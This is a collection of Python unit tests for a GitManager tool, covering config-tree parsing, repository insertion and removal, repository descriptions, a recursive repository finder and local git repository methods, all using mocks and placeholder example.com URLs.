line.BaseLine('', 2, ' ', 'sub', ''),
line.RepoLine(' ', 'hello', ' ', 'world', ' '),
line.BaseLine('', 1, ' ', 'else', ''),
line.RepoLine(' ', 'hello', ' ', 'world', ' ')
]
# the intended results
results = [
d.RepositoryDescription(source='hello',
path='/path/to/home/world'),
d.RepositoryDescription(source='hello',
path='/path/to/home/something/world'),
d.RepositoryDescription(source='hello',
path='/path/to/home/something/sub/world'),
d.RepositoryDescription(source='hello',
path='/path/to/home/else/world')
]
# check that the yielding works properly
for (actual, intended) in zip(t.repositories, results):
self.assertEqual(actual, intended, "Lines parsed properly")
# reset the lines to something that should thrown an error
t.lines = [
line.BaseLine('', 2, ' ', 'something', '')
]
# we are skipping a base level -- this should thrown an error
with self.assertRaises(Exception):
list(t.repositories)
@unittest.mock.patch('os.path.expanduser',
side_effect=lambda s: s.replace("~",
"/path/to/home/"))
def test_locals(self, os_path_expanduser: unittest.mock.Mock):
""" Tests that the locals are yielded properly """
# create a tree instance
t = tree.Tree()
# setup the lines properly
t.lines = [
line.NOPLine("# Top level line with a comment"),
line.RepoLine(' ', 'hello', ' ', 'world', ' '),
line.BaseLine('', 1, ' ', 'something', ' '),
line.RepoLine(' ', 'hello', ' ', 'world', ' '),
line.BaseLine('', 2, ' ', 'sub', ' '),
line.RepoLine(' ', 'hello', ' ', 'world', ' '),
line.BaseLine('', 1, ' ', 'else', ' '),
line.RepoLine(' ', 'hello', ' ', 'world', ' ')
]
# the intended results
results = [
LocalRepository('/path/to/home/world'),
LocalRepository('/path/to/home/something/world'),
LocalRepository('/path/to/home/something/sub/world'),
LocalRepository('/path/to/home/else/world')
]
# check that the yielding works properly
for (actual, intended) in zip(t.locals, results):
self.assertEqual(actual, intended, "Locals parsed properly")
# reset the lines to something that should thrown an error
t.lines = [
line.BaseLine('', 2, ' ', 'something', '')
]
# we are skipping a base level -- this should thrown an error
with self.assertRaises(Exception):
list(t.locals)
@unittest.mock.patch('os.path.expanduser',
side_effect=lambda s: s.replace("~",
"/path/to/home/"))
def test_index(self, os_path_expanduser: unittest.mock.Mock):
""" Tests that the index function works properly """
# create a tree instance
t = tree.Tree()
# setup the lines properly
t.lines = [
line.NOPLine("# Top level line with a comment"),
line.RepoLine(' ', 'hello', ' ', 'world', ' '),
line.BaseLine('', 1, ' ', 'something', ''),
line.RepoLine(' ', 'hello', ' ', 'world', ' '),
line.BaseLine('', 2, ' ', 'sub', ''),
line.RepoLine(' ', 'hello', ' ', 'world', ' '),
line.BaseLine('', 1, ' ', 'else', ''),
line.RepoLine(' ', 'hello', ' ', 'world', ' ')
]
# the intended results
results = [
d.RepositoryDescription(source='hello',
path='/path/to/home/world'),
d.BaseDescription('/path/to/home/something'),
d.RepositoryDescription(source='hello',
path='/path/to/home/something/world'),
d.BaseDescription('/path/to/home/something/sub'),
d.RepositoryDescription(source='hello',
path='/path/to/home/something/sub/world'),
d.BaseDescription('/path/to/home/else'),
d.RepositoryDescription(source='hello',
path='/path/to/home/else/world')
]
# check that the indexes are found properly
for (i, r) in enumerate(results):
self.assertEqual(t.index(r), i + 1, "Lines found as intended")
self.assertEqual(t.index(d.BaseDescription('/path/to/home/weird')),
None,
"Lines not found as intended")
@unittest.mock.patch('os.path.expanduser',
side_effect=lambda s: s.replace("~",
"/path/to/home/"))
def test_contains(self, os_path_expanduser: unittest.mock.Mock):
""" Tests that the contains function works properly """
# create a tree instance
t = tree.Tree()
# setup the lines properly
t.lines = [
line.NOPLine("# Top level line with a comment"),
line.RepoLine(' ', 'hello', ' ', 'world', ' '),
line.BaseLine('', 1, ' ', 'something', ''),
line.RepoLine(' ', 'hello', ' ', 'world', ' '),
line.BaseLine('', 2, ' ', 'sub', ''),
line.RepoLine(' ', 'hello', ' ', 'world', ' '),
line.BaseLine('', 1, ' ', 'else', ''),
line.RepoLine(' ', 'hello', ' ', 'world', ' ')
]
# the intended results
results = [
d.RepositoryDescription(source='hello',
path='/path/to/home/world'),
d.BaseDescription('/path/to/home/something'),
d.RepositoryDescription(source='hello',
path='/path/to/home/something/world'),
d.BaseDescription('/path/to/home/something/sub'),
d.RepositoryDescription(source='hello',
path='/path/to/home/something/sub/world'),
d.BaseDescription('/path/to/home/else'),
d.RepositoryDescription(source='hello',
path='/path/to/home/else/world')
]
# check that the indexes are found properly
for (i, r) in enumerate(results):
self.assertTrue(t.contains(r), "Lines found as intended")
self.assertFalse(t.contains(d.BaseDescription('/path/to/home/weird')),
"Lines not found as intended")
@unittest.mock.patch('os.path.expanduser',
side_effect=lambda s: s.replace("~",
"/path/to/home/"))
def test_insert_at(self, os_path_expanduser: unittest.mock.Mock):
""" Tests that the contains function works properly """
def setup_tree() -> tree.Tree:
# create a tree instance and setup lines
t = tree.Tree()
t.lines = [
line.NOPLine("# comment"),
line.BaseLine(' ', 1, ' ', 'base1', ''),
line.BaseLine(' ', 1, ' ', 'base2', ''),
line.RepoLine(' ', 'git@example.com:/example/repo', ' ',
'example-repo', '')
]
return t
#
# INSERT FAILURES -- for RepositoryDescriptions
#
t1 = setup_tree()
# Inserting into something that doesn't exist throws a ValueError
with self.assertRaises(ValueError):
t1.insert_at(
d.BaseDescription('/path/to/home/else'),
d.RepositoryDescription(source='git@example.com:/example/repo',
path='/path/to/home/else/hello')
)
t2 = setup_tree()
# Inserting into the wrong parent also throws ValueError
with self.assertRaises(ValueError):
t2.insert_at(
d.BaseDescription('/path/to/home/else'),
d.RepositoryDescription(source='git@example.com:/example/repo',
path='/path/to/home/weird/hello')
)
t3 = setup_tree()
# Inserting into the wrong parent also throws ValueError
with self.assertRaises(ValueError):
t2.insert_at(
None,
d.RepositoryDescription(source='git@example.com:/example/repo',
path='/path/to/home/weird/hello')
)
#
# INSERT SUCCESS -- for RepositoryDescriptions
#
t4 = setup_tree()
d4 = d.RepositoryDescription(
source='git@example.com:/example/insertion',
path='/path/to/home/insertion')
# at the very top
self.assertEqual(t4.insert_at(None, d4), 1, 'Inserting a repository '
'top-level')
self.assertEqual(t4.lines, [
line.NOPLine("# comment"),
line.RepoLine(' ', 'git@example.com:/example/insertion', '', '',
''),
line.BaseLine(' ', 1, ' ', 'base1', ''),
line.BaseLine(' ', 1, ' ', 'base2', ''),
line.RepoLine(' ', 'git@example.com:/example/repo', ' ',
'example-repo', '')
])
# inside of an empty group
t5 = setup_tree()
d5 = d.RepositoryDescription(
source='git@example.com:/example/insertion',
path='/path/to/home/base1/insertion')
p5 = d.BaseDescription('/path/to/home/base1')
self.assertEqual(t5.insert_at(p5, d5), 2, 'Inserting a repository '
'into an empty group')
self.assertEqual(t5.lines, [
line.NOPLine("# comment"),
line.BaseLine(' ', 1, ' ', 'base1', ''),
line.RepoLine(' ', 'git@example.com:/example/insertion', '', '',
''),
line.BaseLine(' ', 1, ' ', 'base2', ''),
line.RepoLine(' ', 'git@example.com:/example/repo', ' ',
'example-repo', '')
])
# inside of a full group
t6 = setup_tree()
d6 = d.RepositoryDescription(
source='git@example.com:/example/insertion',
path='/path/to/home/base2/point')
p6 = d.BaseDescription('/path/to/home/base2')
self.assertEqual(t6.insert_at(p6, d6), 4, 'Inserting a repository '
'into a full group')
self.assertEqual(t6.lines, [
line.NOPLine("# comment"),
line.BaseLine(' ', 1, ' ', 'base1', ''),
line.BaseLine(' ', 1, ' ', 'base2', ''),
line.RepoLine(' ', 'git@example.com:/example/repo', ' ',
'example-repo', ''),
line.RepoLine(' ', 'git@example.com:/example/insertion', ' ',
'point', ''),
])
#
# INSERT SUCCESS -- for BaseDescriptions
#
t7 = setup_tree()
d7 = d.BaseDescription('/path/to/home/insertion')
# at the very top
self.assertEqual(t7.insert_at(None, d7), 4, 'Inserting a base '
'top-level')
self.assertEqual(t7.lines, [
line.NOPLine("# comment"),
line.BaseLine(' ', 1, ' ', 'base1', ''),
line.BaseLine(' ', 1, ' ', 'base2', ''),
line.RepoLine(' ', 'git@example.com:/example/repo', ' ',
'example-repo', ''),
line.BaseLine(' ', 1, ' ', 'insertion', '')
])
# inside of an empty group
t8 = setup_tree()
d8 = d.BaseDescription('/path/to/home/base1/insertion')
p8 = d.BaseDescription('/path/to/home/base1')
self.assertEqual(t8.insert_at(p8, d8), 2, 'Inserting a base '
'into an empty group')
self.assertEqual(t8.lines, [
line.NOPLine("# comment"),
line.BaseLine(' ', 1, ' ', 'base1', ''),
line.BaseLine(' ', 2, ' ', 'insertion', ''),
line.BaseLine(' ', 1, ' ', 'base2', ''),
line.RepoLine(' ', 'git@example.com:/example/repo', ' ',
'example-repo', '')
])
# inside of a full group
t9 = setup_tree()
d9 = d.BaseDescription('/path/to/home/base2/insertion')
p9 = d.BaseDescription('/path/to/home/base2')
self.assertEqual(t9.insert_at(p9, d9), 4, 'Inserting a base '
'into a full group')
self.assertEqual(t9.lines, [
line.NOPLine("# comment"),
line.BaseLine(' ', 1, ' ', 'base1', ''),
line.BaseLine(' ', 1, ' ', 'base2', ''),
line.RepoLine(' ', 'git@example.com:/example/repo', ' ',
'example-repo', ''),
line.BaseLine(' ', 2, ' ', 'insertion', ''),
])
# inside of a full group
t10 = setup_tree()
d10 = d.BaseDescription('/insertion')
p10 = d.BaseDescription('/path/to/home/base2')
self.assertEqual(t10.insert_at(p10, d10), 4, 'Inserting a base with'
'absolute path')
self.assertEqual(t10.lines, [
line.NOPLine("# comment"),
line.BaseLine(' ', 1, ' ', 'base1', ''),
line.BaseLine(' ', 1, ' ', 'base2', ''),
line.RepoLine(' ', 'git@example.com:/example/repo', ' ',
'example-repo', ''),
line.BaseLine(' ', 2, ' ', '/insertion', ''),
])
@unittest.mock.patch('os.path.expanduser',
side_effect=lambda s: s.replace("~",
"/path/to/home/"))
def test_insert_base_or_get(self, os_path_expanduser: unittest.mock.Mock):
def setup_tree() -> tree.Tree:
# create a tree instance and setup lines
t = tree.Tree()
t.lines = [
line.NOPLine("# comment"),
line.BaseLine(' ', 1, ' ', 'base1', ''),
line.BaseLine(' ', 1, ' ', 'base2', ''),
line.RepoLine(' ', 'git@example.com:/example/repo', ' ',
'example-repo', '')
]
return t
# inserting an existing base -- do nothing
t1 = setup_tree()
d1 = d.BaseDescription('/path/to/home/base1')
self.assertEqual(t1.insert_base_or_get(d1), 1, 'inserting an '
'existing base')
self.assertEqual(
t1.lines,
[
line.NOPLine("# comment"),
line.BaseLine(' ', 1, ' ', 'base1', ''),
line.BaseLine(' ', 1, ' ', 'base2', ''),
line.RepoLine(' ', 'git@example.com:/example/repo', ' ',
'example-repo', '')
]
)
# inserting a new base top-level
t2 = setup_tree()
d2 = d.BaseDescription('/path/to/home/base3')
self.assertEqual(t2.insert_base_or_get(d2), 4, 'inserting a new '
'top-level base')
self.assertEqual(
t2.lines,
[
line.NOPLine("# comment"),
line.BaseLine(' ', 1, ' ', 'base1', ''),
line.BaseLine(' ', 1, ' ', 'base2', ''),
line.RepoLine(' ', 'git@example.com:/example/repo', ' ',
'example-repo', ''),
line.BaseLine(' ', 1, ' ', 'base3', '')
]
)
# inserting an absolute path
t3 = setup_tree()
d3 = d.BaseDescription('/base3')
self.assertEqual(t3.insert_base_or_get(d3), 4, 'inserting a new '
'absolute-path base')
self.assertEqual(
t3.lines,
[
line.NOPLine("# comment"),
line.BaseLine(' ', 1, ' ', 'base1', ''),
line.BaseLine(' ', 1, ' ', 'base2', ''),
line.RepoLine(' ', 'git@example.com:/example/repo', ' ',
'example-repo', ''),
line.BaseLine(' ', 1, ' ', '/base3', '')
]
)
# inserting a single sublevel
t4 = setup_tree()
d4 = d.BaseDescription('/path/to/home/base1/a')
self.assertEqual(t4.insert_base_or_get(d4), 2, 'inserting a single '
'new sub-level base')
self.assertEqual(
t4.lines,
[
line.NOPLine("# comment"),
line.BaseLine(' ', 1, ' ', 'base1', ''),
line.BaseLine(' ', 2, ' ', 'a', ''),
line.BaseLine(' ', 1, ' ', 'base2', ''),
line.RepoLine(' ', 'git@example.com:/example/repo', ' ',
'example-repo', '')
]
)
# inserting multiple sublevels
t5 = setup_tree()
d5 = d.BaseDescription('/path/to/home/base1/a/b/c')
self.assertEqual(t5.insert_base_or_get(d5), 4, 'inserting multiple '
'new sub-level bases')
self.assertEqual(
t5.lines,
[
line.NOPLine("# comment"),
line.BaseLine(' ', 1, ' ', 'base1', ''),
line.BaseLine(' ', 2, ' ', 'a', ''),
line.BaseLine(' ', 3, ' ', 'b', ''),
line.BaseLine(' ', 4, ' ', 'c', ''),
line.BaseLine(' ', 1, ' ', 'base2', ''),
line.RepoLine(' ', 'git@example.com:/example/repo', ' ',
'example-repo', ''),
]
)
@unittest.mock.patch('os.path.expanduser',
side_effect=lambda s: s.replace("~",
"/path/to/home/"))
def test_insert_repo_or_get(self, os_path_expanduser: unittest.mock.Mock):
def setup_tree() -> tree.Tree:
# create a tree instance and setup lines
t = tree.Tree()
t.lines = [
line.NOPLine("# comment"),
line.BaseLine(' ', 1, ' ', 'base1', ''),
line.BaseLine(' ', 1, ' ', 'base2', ''),
line.RepoLine(' ', 'git@example.com:/example/repo', ' ',
'example-repo', '')
]
return t
# inserting an existing repo -- do nothing
t1 = setup_tree()
d1 = d.RepositoryDescription('git@example.com:/example/repo',
'/path/to/home/base2/example-repo')
self.assertEqual(t1.insert_repo_or_get(d1), 3, 'inserting an '
'existing repo')
self.assertEqual(
t1.lines,
[
line.NOPLine("# comment"),
line.BaseLine(' ', 1, ' ', 'base1', ''),
line.BaseLine(' ', 1, ' ', 'base2', ''),
line.RepoLine(' ', 'git@example.com:/example/repo', ' ',
'example-repo', '')
]
)
# inserting a new repo top-level
t2 = setup_tree()
d2 = d.RepositoryDescription('git@example.com:/example/insert',
'/path/to/home/insert')
self.assertEqual(t2.insert_repo_or_get(d2), 1, 'inserting a new '
'top-level repo')
self.assertEqual(
t2.lines,
[
line.NOPLine("# comment"),
line.RepoLine(' ', 'git@example.com:/example/insert', '',
'', ''),
line.BaseLine(' ', 1, ' ', 'base1', ''),
line.BaseLine(' ', 1, ' ', 'base2', ''),
line.RepoLine(' ', 'git@example.com:/example/repo', ' ',
'example-repo', '')
]
)
# inserting a new repo with multiple sublevels
t5 = setup_tree()
d5 = d.RepositoryDescription('git@example.com:/example/insert',
'/path/to/home/base1/a/b/c/insert')
self.assertEqual(t5.insert_repo_or_get(d5), 5, 'inserting a new '
'repo and sub-levels')
self.assertEqual(
t5.lines,
[
line.NOPLine("# comment"),
line.BaseLine(' ', 1, ' ', 'base1', ''),
line.BaseLine(' ', 2, ' ', 'a', ''),
line.BaseLine(' ', 3, ' ', 'b', ''),
line.BaseLine(' ', 4, ' ', 'c', ''),
line.RepoLine(' ', 'git@example.com:/example/insert',
'', '', ''),
line.BaseLine(' ', 1, ' ', 'base2', ''),
line.RepoLine(' ', 'git@example.com:/example/repo', ' ',
'example-repo', ''),
]
)
@unittest.mock.patch('os.path.expanduser',
side_effect=lambda s: s.replace("~",
"/path/to/home/"))
def test_remove_local(self, os_path_expanduser: unittest.mock.Mock):
""" Tests that removing local repositories works properly """
# create a tree instance
t = tree.Tree()
# setup the lines properly
t.lines = [
line.NOPLine("# Top level line with a comment"),
line.RepoLine(' ', 'hello', ' ', 'hello', ' '),
line.BaseLine('', 1, ' ', 'something', ''),
line.RepoLine(' ', 'something/world', ' ', 'world', ' '),
line.BaseLine('', 2, ' ', 'sub', ''),
line.RepoLine(' ', 'something/sub/hello', ' ', 'hello', ' '),
line.BaseLine('', 1, ' ', 'else', ''),
line.RepoLine(' ', 'something/else/world', ' ', 'world', ' ')
]
# the expected array after the lines were removed
result = [
line.NOPLine("# Top level line with a comment"),
line.RepoLine(' ', 'hello', ' ', 'hello', ' '),
line.BaseLine('', 1, ' ', 'something', ''),
line.RepoLine(' ', 'something/world', ' ', 'world', ' '),
line.BaseLine('', 2, ' ', 'sub', ''),
line.RepoLine(' ', 'something/sub/hello', ' ', 'hello', ' '),
line.BaseLine('', 1, ' ', 'else', '')
]
# check that an existing repo gets removed
didRemove = t.remove_local(LocalRepository('/path/to/home/else/world'))
self.assertTrue(didRemove)
self.assertEqual(t.lines, result, 'Removed existing repo')
# check that a non-existing repository does not get removed
didNotRemove = t.remove_local(
LocalRepository('/path/to/home/nonexistent')
)
self.assertFalse(didNotRemove)
self.assertEqual(t.lines, result, 'Did not remove any lines')
@unittest.mock.patch('os.path.expanduser',
side_effect=lambda s: s.replace("~",
"/path/to/home/"))
def test_find(self, os_path_expanduser: unittest.mock.Mock):
""" Tests that finding repositories works properly """
# create a tree instance
t = tree.Tree()
# setup the lines properly
t.lines = [
line.NOPLine("# Top level line with a comment"),
line.RepoLine(' ', 'hello', ' ', 'hello', ' '),
line.BaseLine('', 1, ' ', 'something', ''),
line.RepoLine(' ', 'something/world', ' ', 'world', ' '),
line.BaseLine('', 2, ' ', 'sub', ''),
line.RepoLine(' ', 'something/sub/hello', ' ', 'hello', ' '),
line.BaseLine('', 1, ' ', 'else', ''),
line.RepoLine(' ', 'something/else/world', ' ', 'world', ' ')
]
# the expected 'hello' repos
results = [
d.RepositoryDescription(source='hello',
path='/path/to/home/hello'),
d.RepositoryDescription(source='something/sub/hello',
path='/path/to/home/something/sub/hello')
]
# perform the test
actual = t.find('world')
for (r, a) in zip(results, actual):
self.assertEqual(r, a)
@unittest.mock.patch('os.path.expanduser',
side_effect=lambda s: s.replace("~",
"/path/to/home/"))
def test_rebuild(self, os_path_expanduser: unittest.mock.Mock):
# create a tree instance and setup lines
t = tree.Tree()
t.lines = [
line.NOPLine("# comment"),
line.BaseLine(' ', 1, ' ', 'base1', ''),
line.RepoLine(' ', 'git@example.com:/example/repo', ' ',
'example-repo', ''),
line.BaseLine(' ', 1, ' ', 'base2', ''),
line.RepoLine(' ', 'git@example.com:/example/repo', ' ',
'example-repo', '')
]
t.rebuild()
self.assertEqual(t.lines, [
line.BaseLine(' ', 1, ' ', 'base1', ''),
line.RepoLine(' ', 'git@example.com:/example/repo', ' ',
'example-repo', ''),
line.BaseLine(' ', 1, ' ', 'base2', ''),
line.RepoLine(' ', 'git@example.com:/example/repo', ' ',
'example-repo', '')
])
t = tree.Tree()
t.lines = [line.RootLine('', '', 'root', '')]
t.rebuild()
self.assertEqual(t.lines, [line.RootLine('', '', 'root', '')],
'store relative root')
t = tree.Tree()
t.lines = [line.RootLine('', '', '/path/to/home', '')]
t.rebuild()
self.assertEqual(t.lines, [], 'hide root when it is /path/to/home')
t = tree.Tree()
t.lines = [line.RootLine('', '', '/opt/root', '')]
t.rebuild()
self.assertEqual(t.lines, [line.RootLine('', '', '/opt/root', '')])
--- FILE SEPARATOR ---
import unittest
import unittest.mock
from GitManager.config import line
from GitManager.repo import description, implementation
class TestBaseDescription(unittest.TestCase):
""" Tests that the BaseDescription class works properly """
def test_eq(self):
""" Tests that equality works properly """
self.assertEqual(
description.BaseDescription('/path/to/local'),
description.BaseDescription('/path/to/local'),
'equality between two descriptions'
)
self.assertNotEqual(
description.BaseDescription('/path/to/local/a'),
description.BaseDescription('/path/to/local/b'),
'inequality between two descriptions'
)
class TestRepositoryDescription(unittest.TestCase):
""" Tests that the RepositoryDescription class works properly """
def test_eq(self):
""" Tests that equality works properly """
self.assertEqual(description.RepositoryDescription(
'git@github.com:/example/remote',
'/path/to/local'),
description.RepositoryDescription(
'git@github.com:/example/remote',
'/path/to/local'),
'equality between two descriptions'
)
self.assertNotEqual(description.RepositoryDescription(
'git@github.com:/example/remote',
'/path/to/local'),
description.RepositoryDescription(
'github.com:/example/remote',
'/path/to/local'),
'inequality between two descriptions'
)
def test_local(self):
""" Tests that local repositories are parsed properly """
self.assertEqual(description.RepositoryDescription(
'git@github.com:/example/remote', '/path/to/local').local,
implementation.LocalRepository('/path/to/local'))
def test_remote(self):
""" Tests that the remote repositories are parsed properly """
self.assertEqual(description.RepositoryDescription(
'git@github.com:/example/remote', '/path/to/local').remote,
implementation.RemoteRepository(
'git@github.com:/example/remote'))
def test_to_repo_line(self):
desc1 = description.RepositoryDescription(
'git@github.com:/example/remote/repo', '/path/to/local/repo')
res1 = (
description.BaseDescription('/path/to/local'),
line.RepoLine(
' ', 'git@github.com:/example/remote/repo', '', '', ' '
)
)
self.assertEqual(desc1.to_repo_line(' ', ' ', ' '), res1,
'turning a RepositoryDescription into a RepoLine '
'omitting final component')
desc2 = description.RepositoryDescription(
'git@github.com:/example/remote/repo', '/path/to/local/repo/clone')
res2 = (
description.BaseDescription('/path/to/local/repo'),
line.RepoLine(
' ', 'git@github.com:/example/remote/repo', ' ', 'clone',
' '
)
)
self.assertEqual(desc2.to_repo_line(' ', ' ', ' '), res2,
'turning a RepositoryDescription into a RepoLine '
'including final component')
--- FILE SEPARATOR ---
import unittest
import unittest.mock
from GitManager.repo import finder, description
class TestFinder(unittest.TestCase):
""" Tests that the Finder() class works correctly """
@unittest.mock.patch("os.listdir")
@unittest.mock.patch("os.path")
@unittest.mock.patch("GitManager.repo.finder.Finder.get_from_path")
def test_find_recursive(self,
Finder_get_from_path: unittest.mock.Mock,
os_path: unittest.mock.Mock,
os_listdir: unittest.mock.Mock):
""" Tests that the find_recursive method works correctly """
# Setup all the mocks
links = ['/link']
dirs = ['/link', '/link/a', '/link/b', '/folder', '/folder/a',
'/folder/b']
listings = {
'/': ['link', 'file.txt', 'folder', 'folder.txt'],
'/link': ['a', 'a.txt', 'b', 'b.txt'],
'/link/a': [],
'/link/b': [],
'/folder': ['a', 'a.txt', 'b', 'b.txt'],
'/folder/a': [],
'/folder/b': [],
}
repos = {
'/link/a': 'git@example.com:link/a',
'/link/b': 'git@example.com:link/b',
'/folder': 'git@example.com:folder',
'/folder/a': 'git@example.com:folder/a',
'/folder/b': 'git@example.com:folder/b',
}
def join_mock(*args):
return '/'.join(args).replace('//', '/')
os_path.islink.side_effect = lambda l: l in links
os_path.isdir.side_effect = lambda d: d in dirs
os_listdir.side_effect = lambda d: listings[d]
os_path.join.side_effect = join_mock
def frompath_mock(path):
if path in repos:
return description.RepositoryDescription(repos[path], path)
else:
raise ValueError()
Finder_get_from_path.side_effect = frompath_mock
# finding repositories not allowing links and not allowing
# sub-repositories
self.assertEqual(list(finder.Finder.
find_recursive('/', allow_links=False,
continue_in_repository=False)),
[
description.RepositoryDescription(
'git@example.com:folder',
'/folder'
)
])
# finding repositories allowing links but not more
self.assertEqual(list(finder.Finder.
find_recursive('/', allow_links=True,
continue_in_repository=False)),
[
description.RepositoryDescription(
'git@example.com:link/a',
'/link/a'
),
description.RepositoryDescription(
'git@example.com:link/b',
'/link/b'
),
description.RepositoryDescription(
'git@example.com:folder',
'/folder'
)
])
# finding repositories allowing repos in repos, but not more
self.assertEqual(list(finder.Finder.
find_recursive('/', allow_links=False,
continue_in_repository=True)),
[
description.RepositoryDescription(
'git@example.com:folder',
'/folder'
),
description.RepositoryDescription(
'git@example.com:folder/a',
'/folder/a'
),
description.RepositoryDescription(
'git@example.com:folder/b',
'/folder/b'
)
])
# finding repositories allow repos in repos and links
self.assertEqual(list(finder.Finder.
find_recursive('/', allow_links=True,
continue_in_repository=True)),
[
description.RepositoryDescription(
'git@example.com:link/a',
'/link/a'
),
description.RepositoryDescription(
'git@example.com:link/b',
'/link/b'
),
description.RepositoryDescription(
'git@example.com:folder',
'/folder'
),
description.RepositoryDescription(
'git@example.com:folder/a',
'/folder/a'
),
description.RepositoryDescription(
'git@example.com:folder/b',
'/folder/b'
)
])
@unittest.mock.patch("GitManager.repo.implementation.LocalRepository")
def test_get_from_path(self,
implementation_LocalRepository: unittest.mock.Mock):
""" Tests that the get_from_path function works properly """
# if there is no local repository, we should throw a value error
implementation_LocalRepository.return_value.exists.return_value = False
with self.assertRaises(ValueError):
finder.Finder.get_from_path('/path/to/repository')
implementation_LocalRepository.assert_called_with(
'/path/to/repository')
# reset the mocks
implementation_LocalRepository.reset_mock()
# local repository exists, and the return
implementation_LocalRepository.return_value.exists.return_value = True
implementation_LocalRepository.return_value.get_remote_url \
.return_value = 'git@example.com:example/repo'
# check that a repository with an origin is found properly
self.assertEqual(
finder.Finder.get_from_path('/path/to/repository'),
description.RepositoryDescription(
'git@example.com:example/repo',
'/path/to/repository'
)
)
implementation_LocalRepository.assert_called_with(
'/path/to/repository')
implementation_LocalRepository.return_value.get_remote_url \
.assert_called_with('origin')
# reset the mocks
implementation_LocalRepository.reset_mock()
def mock_raise(arg):
raise ValueError()
# raises an error if no url is returned
implementation_LocalRepository.return_value.exists.return_value = True
implementation_LocalRepository.return_value.remotes = []
implementation_LocalRepository.return_value.get_remote_url \
.side_effect = mock_raise
# check that a repository
with self.assertRaises(ValueError):
finder.Finder.get_from_path('/path/to/repository')
implementation_LocalRepository.return_value.get_remote_url \
.assert_called_with('origin')
# reset the mocks
implementation_LocalRepository.reset_mock()
# raises an error if no url is returned
implementation_LocalRepository.return_value.exists.return_value = True
implementation_LocalRepository.return_value.remotes = ['upstream']
implementation_LocalRepository.return_value.get_remote_url \
.side_effect = mock_raise
# check that a repository
with self.assertRaises(ValueError):
finder.Finder.get_from_path('/path/to/repository')
implementation_LocalRepository.return_value.get_remote_url \
.assert_any_call('origin')
implementation_LocalRepository.return_value.get_remote_url \
.assert_any_call('upstream')
# reset the mocks
implementation_LocalRepository.reset_mock()
def mock_originerror(name):
if name == 'origin':
raise ValueError()
else:
return 'git@example.com:example/repo'
# raises an error if no url is returned
implementation_LocalRepository.return_value.exists.return_value = True
implementation_LocalRepository.return_value.remotes = ['upstream']
implementation_LocalRepository.return_value.get_remote_url \
.side_effect = mock_originerror
# check that a repository with an upstream is found properly
self.assertEqual(
finder.Finder.get_from_path('/path/to/repository'),
description.RepositoryDescription(
'git@example.com:example/repo',
'/path/to/repository'
)
)
implementation_LocalRepository.return_value.get_remote_url \
.assert_any_call('origin')
implementation_LocalRepository.return_value.get_remote_url \
.assert_any_call('upstream')
--- FILE SEPARATOR ---
import unittest
import unittest.mock
from GitManager.repo import implementation
class TestLocalRepository(unittest.TestCase):
def test_eq(self):
""" Checks that equality between LocalRepositories works properly """
self.assertEqual(
implementation.LocalRepository('/path/to/clone'),
implementation.LocalRepository('/path/to/clone'),
'equality between two LocalRepositories'
)
self.assertNotEqual(
implementation.LocalRepository('/home/user/example'),
implementation.LocalRepository(
'/home/user/example/.git'),
'difference between two LocalRepositories')
def test_path(self):
""" Tests that the path property works as intended """
self.assertEqual(
implementation.LocalRepository('/path/to/clone').path,
'/path/to/clone',
'path of a simple repository'
)
self.assertEqual(
implementation.LocalRepository(
'/home/user/example').path,
'/home/user/example',
'path of a simple git repository'
)
def test_str(self):
""" Tests that the str() of a remoteRepository works properly """
self.assertEqual(
str(implementation.LocalRepository(
'/path/to/clone')),
'/path/to/clone',
'str() of a simple repository'
)
self.assertEqual(
str(implementation.LocalRepository(
'/home/user/example')),
'/home/user/example',
'str() of a simple git repository'
)
def test_repr(self):
""" Tests that the repr() of a remoteRepository works properly """
self.assertEqual(
repr(implementation.LocalRepository(
'/path/to/clone')),
'<LocalRepository /path/to/clone>',
'str() of a simple repository'
)
self.assertEqual(
repr(implementation.LocalRepository(
'/home/user/example')),
'<LocalRepository /home/user/example>',
'repr() of a simple git repository'
)
@unittest.mock.patch('GitManager.utils.run.GitRun')
def test_remotes(self, run_gitrun: unittest.mock.Mock):
""" checks that remotes properly works as intended """
# create a repository
repo = implementation.LocalRepository('/path/to/repository')
# set the return value
run_gitrun.return_value.stdout = unittest.mock.mock_open(
read_data="origin\nupstream".encode("utf-8"))()
self.assertEqual(repo.remotes, ["origin", "upstream"], "Remotes are "
"parsed "
"properly")
run_gitrun.assert_called_with('remote', 'show', '-n',
cwd='/path/to/repository')
run_gitrun.return_value.wait.assert_called_with()
@unittest.mock.patch('GitManager.utils.run.GitRun')
def test_get_remote_url(self, run_gitrun: unittest.mock.Mock):
""" checks that get_remote_url function works as intended """
# create a repository
repo = implementation.LocalRepository('/path/to/repository')
# throw an error for the remote
run_gitrun.return_value.stdout = unittest.mock.mock_open(
read_data="fatal: No such remote 'example'\n".encode("utf-8"))()
run_gitrun.return_value.success = False
# check that an error is thrown if we look for a remote that doesn't
# exist
with self.assertRaises(ValueError):
repo.get_remote_url("example")
run_gitrun.assert_called_with('remote', 'get-url', 'example',
cwd='/path/to/repository')
# thrown no error
run_gitrun.return_value.stdout = unittest.mock.mock_open(
read_data="git@example.com:example/repo\n".encode("utf-8"))()
run_gitrun.return_value.success = True
# check that we can actually get the remote url
self.assertEqual(repo.get_remote_url('origin'),
'git@example.com:example/repo', 'getting a remote '
'url')
# check that the git run has been called
run_gitrun.assert_called_with('remote', 'get-url', 'origin',
cwd='/path/to/repository')
@unittest.mock.patch('GitManager.utils.run.GitRun')
@unittest.mock.patch('os.path.isdir')
def test_exists(self, os_path_isdir: unittest.mock.Mock,
run_gitrun: unittest.mock.Mock):
""" checks that exists method makes an external call """
# create a repository
repo = implementation.LocalRepository('/path/to/repository')
# setup mocks so that the path does not exist
os_path_isdir.return_value = False
self.assertFalse(repo.exists(), 'non-existence of a repository')
os_path_isdir.assert_called_with('/path/to/repository')
run_gitrun.assert_not_called()
# setup mocks so that the path exists but the --show-toplevel fails
os_path_isdir.reset_mock()
os_path_isdir.return_value = True
run_gitrun.reset_mock()
run_gitrun.return_value.success = False
run_gitrun.return_value.stdout = unittest.mock.mock_open(
read_data="/path/to\n".encode("utf-8"))()
self.assertFalse(repo.exists(),
'non-existence of a repository when toplevel fails')
os_path_isdir.assert_called_with('/path/to/repository')
run_gitrun.assert_called_with('rev-parse', '--show-toplevel',
cwd='/path/to/repository')
run_gitrun.reset_mock()
run_gitrun.return_value.success = True
run_gitrun.return_value.stdout = unittest.mock.mock_open(
read_data="/path/to\n".encode("utf-8"))()
self.assertFalse(repo.exists(),
'non-existence of a repository when not toplevel')
os_path_isdir.assert_called_with('/path/to/repository')
